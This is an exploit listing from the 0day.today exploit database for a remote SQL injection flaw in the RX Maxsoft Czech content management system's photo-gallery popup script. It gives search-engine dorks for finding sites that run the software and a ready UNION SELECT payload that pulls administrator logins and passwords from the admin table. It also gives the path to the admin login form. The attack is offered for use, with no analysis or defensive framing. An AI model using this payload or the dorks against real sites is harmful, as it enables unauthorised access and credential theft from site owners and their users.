[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2865
Category
web applications
Date add
09-04-2008
Platform
unsorted
====================================================================
RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability
====================================================================




##########################################
#
# Provozovano na RS MAXSOFT SQL-Injection
#
# PAGE:http://redakcni-system.maxsoft.cz/
#
###########################################
#
# DORK 1 : "RS MAXSOFT"
#
# DORK 2 : "Provozovano na RS MAXSOFT"
#
###########################################
you will see adminname and password on title

EXPLOiT:

modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin


ADMiN LOGiN=admin.php?page=logfrm


###########################################



#  0day.today [2024-07-02]  #